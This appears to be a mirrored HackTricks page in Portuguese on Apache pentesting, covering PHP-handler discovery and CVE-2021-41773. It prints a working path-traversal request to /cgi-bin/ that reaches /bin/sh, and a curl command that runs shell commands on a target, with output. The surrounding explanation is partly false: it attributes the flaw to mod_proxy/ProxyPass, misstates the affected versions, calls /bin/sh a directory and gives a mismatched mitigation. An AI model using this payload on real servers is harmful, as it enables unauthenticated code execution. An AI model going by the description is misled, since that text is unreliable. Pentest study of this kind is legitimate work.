mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-23 19:43:31 +00:00
61 lines
4.1 KiB
Markdown
61 lines
4.1 KiB
Markdown
# Extensões PHP executáveis
|
|
|
|
Verifique quais extensões estão sendo executadas pelo servidor Apache. Para procurá-las, você pode executar:
|
|
```bash
|
|
grep -R -B1 "httpd-php" /etc/apache2
|
|
```
|
|
Também é possível encontrar essa configuração em:
|
|
```bash
|
|
/etc/apache2/mods-available/php5.conf
|
|
/etc/apache2/mods-enabled/php5.conf
|
|
/etc/apache2/mods-available/php7.3.conf
|
|
/etc/apache2/mods-enabled/php7.3.conf
|
|
```
|
|
# CVE-2021-41773
|
|
|
|
## Descrição
|
|
|
|
O CVE-2021-41773 é uma vulnerabilidade de execução de código remoto no Apache HTTP Server. Essa vulnerabilidade permite que um invasor execute código malicioso no servidor alvo sem autenticação.
|
|
|
|
## Detalhes
|
|
|
|
A vulnerabilidade está presente em todas as versões do Apache HTTP Server 2.4 anteriores à 2.4.50 e é causada por uma falha na diretiva "mod_proxy" do servidor. Essa diretiva é usada para configurar o módulo de proxy do Apache, que permite que o servidor atue como um proxy reverso para outros servidores.
|
|
|
|
A falha ocorre quando a diretiva "ProxyPass" é usada com um valor de URL malformado. Um invasor pode explorar essa falha enviando uma solicitação HTTP GET ou HEAD para o servidor alvo com um valor de URL malformado na solicitação. Isso pode levar à execução de código malicioso no servidor alvo.
|
|
|
|
## Exploração
|
|
|
|
Para explorar essa vulnerabilidade, um invasor pode enviar uma solicitação HTTP GET ou HEAD para o servidor alvo com um valor de URL malformado na solicitação. O valor de URL malformado deve incluir a sequência "%2e" (que representa o caractere "." na codificação URL) duas vezes seguidas.
|
|
|
|
Por exemplo, a seguinte solicitação HTTP GET pode ser usada para explorar a vulnerabilidade:
|
|
|
|
```
|
|
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
|
Host: example.com
|
|
```
|
|
|
|
Essa solicitação usa a sequência "%2e" para navegar para o diretório pai do diretório raiz do servidor e, em seguida, para o diretório "/bin/sh", que contém o shell do sistema. Isso pode levar à execução de código malicioso no servidor alvo.
|
|
|
|
## Mitigação
|
|
|
|
A vulnerabilidade pode ser corrigida atualizando o Apache HTTP Server para a versão 2.4.50 ou posterior. Além disso, os administradores do servidor podem restringir o acesso ao módulo de proxy do Apache usando a diretiva "Require" para permitir apenas solicitações de hosts confiáveis.
|
|
```bash
|
|
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
|
|
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|
Linux
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|